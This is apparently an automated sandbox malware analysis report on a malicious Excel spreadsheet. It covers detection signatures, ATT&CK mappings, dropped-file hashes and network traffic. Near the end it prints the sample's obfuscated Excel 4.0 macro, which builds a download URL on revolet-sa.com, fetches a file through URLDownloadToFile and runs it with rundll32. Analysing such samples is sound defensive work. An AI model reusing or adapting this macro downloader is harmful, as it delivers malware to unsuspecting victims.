Analysis Report SecuriteInfo.com.Heur.4923.6908
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
NaN% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382906 |
Start date: | 06.04.2021 |
Start time: | 21:02:11 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Heur.4923.6908 (renamed file extension from 6908 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
21:02:37 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67964 |
Entropy (8bit): | 7.879494848476225 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70m:LqeRrW2JyW32AiHD2sTU2yF70m |
MD5: | 69B226B04223F0B0238B83974D2EA386 |
SHA1: | 9CC6B16D0DB0A90D17A4426B81499D88D86A6D36 |
SHA-256: | 768DC11780C913FD228808FF9D0C912E1ADB56CC448C8DE5C0243C54E7B34AC6 |
SHA-512: | DCAD9D4BB120204A6A6E32279C1280BFD9831826DF9E99E21ACE8530A158B174AC5C45584B5A40934F44D07E9C95AE594AF088C621BD0620041FC3B49A4D1C43 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.0244134949223245 |
Encrypted: | false |
SSDEEP: | 48:Kb6Uhj56fOgWh3cvwhzqHb6UhB6LHf+6snQvOahBMcF:Kb6EZmEqHb6Ce2p6F |
MD5: | 32026F85F5458AF52500D88C74181342 |
SHA1: | 8DD0C3CBA5315A72899EC2135E0F88F0EF86FEA5 |
SHA-256: | 6146AADF5EBB1EFE3AB3973AD286F31AF5E201DF1C73CFF1E88BFCA64202F111 |
SHA-512: | 7C6848CC4BF7453DF99B7EC45A76A2A1C0FC2755A56FD3235978361E0457D76028565008E2DF0DD582BDBF73AD44301C2F2A4F56287F4DED60C14CEDDF789B28 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.473479259150778 |
Encrypted: | false |
SSDEEP: | 12:85QHiXcLgXg/XAlCPCHaX7B8NB/vVUKUX+WnicvbwbDtZ3YilMMEpxRljK6TdJP8:85QiXK/XTr6NEYegDv3qfrNru/ |
MD5: | 8E28D7ED19E162195111288F4BAAC845 |
SHA1: | CB2FECDBF220BA4F7ACCAB9B686D04DA7A5F7EA8 |
SHA-256: | 7721E15E75EFC840BC2ABFC8C133E52FC25160C7D1921AF8D4A8F006C2400A66 |
SHA-512: | 59B73496DDB43A82036E15E499FE16D1842DC4095143BAC93129AA9D8F3100A223A3A9BB18B3344772D782639950268C4F8C9FB03D5B5402D309A4DC9E11986F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2188 |
Entropy (8bit): | 4.560543176315966 |
Encrypted: | false |
SSDEEP: | 48:8HD6/XT+N3zaHhLbHhLfQh2HD6/XT+N3zaHhLbHhLfQ/:8+/X6N3ObfQh2+/X6N3ObfQ/ |
MD5: | 7DD685413EF4D89A020109D0F6F51E52 |
SHA1: | AB9EACA8EED566B3E6CE5C911AC20CFAB4B519EF |
SHA-256: | 64BBE802CF5EDF3A618673534AE194A6DD897777E8C6BD9B8E0AAC4CAD22F8A6 |
SHA-512: | 17DFD5F663A1D8F18E3F4B6F4F25099ECAE45F7E1A8BAEB8982D1A8763A9F65D22B0D690D727C02CBE490B495022DFFEE429CD628A96649F0452E59FA826B989 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131 |
Entropy (8bit): | 4.807590888661823 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bGY6YCuscbGY6YCmM0bGY6YCv:dj60QY7QYU0QYs |
MD5: | CB194388983FF45057D1112C8A8ECD05 |
SHA1: | 932BA73D18BE24F3BE3D3BF370E344B5A4680019 |
SHA-256: | 7B4232CBF84DD4BD653C4D721A934981E65173F5032287C788F5790B6DBB867B |
SHA-512: | D69AA648D291FABB496DC5F2C1BAF1C850F51CE107938CEC13EDCECB664C3F066D945B0C5ECB06AC53D0ACC6F7B4543C698C245CF8C78C8CCCA5A30E046C4AD6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230317944430852 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSX2jTUqyF70xi5W2Y657WY657XI8rmju:G8rmjAItyzElBIL6lECbgBvP5NmuCSoJ |
MD5: | 9BCFFF4764ED600F9C98476013B7179E |
SHA1: | 3D5EC66CF26FAF7BCCC4C16644E6700B4DE01C69 |
SHA-256: | 2D39DA68CE613447388F86BBD992865CC9ED9905EA99DA1A21EF30304C7A43CB |
SHA-512: | B5EFC52059FC8E91BD100CE3F3FC67E659DBC2D96F445E5E2F51FBA12A3D4365EF9D87E11367D146CE3FF2AAEBAA937721EFE900830A63D891F21616AD75F9B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: |
|
File name: | SecuriteInfo.com.Heur.4923.xls |
File size: | 267776 |
MD5: | e56e32e50718813c2a9428de1d3ba674 |
SHA1: | 90cfd7975eadf45a34361e1a1def62ab1d81cad1 |
SHA256: | 56af77e2f4b36f94264cbb975bbea753fa5a4b2bec98a4fe8235d5ec28543fcb |
SHA512: | 8f6806518e709bcdc4f300529f1441cd16fcd274c91b4fc610966e818b25aed5edcb0b97c07d4ea060ebeef470c9ce6f67e8e6d99a6eec7c7ce0d5f1ff8c07ab |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0+:Fh+ |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Heur.4923.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247521269318 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 21:03:00.186563969 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186568975 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186575890 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186583996 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186589956 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186605930 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186641932 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186666965 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186678886 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186681032 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186718941 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186729908 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186747074 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186767101 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186783075 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186808109 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186836004 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186846018 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186858892 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:03:00.186883926 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:03:00.186911106 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 21:02:58.993803978 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 21:02:59.039887905 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 6, 2021 21:02:58.993803978 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 6, 2021 21:02:59.039887905 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 21:02:59.245107889 CEST | 0 | OUT | |
Apr 6, 2021 21:02:59.806935072 CEST | 2 | IN |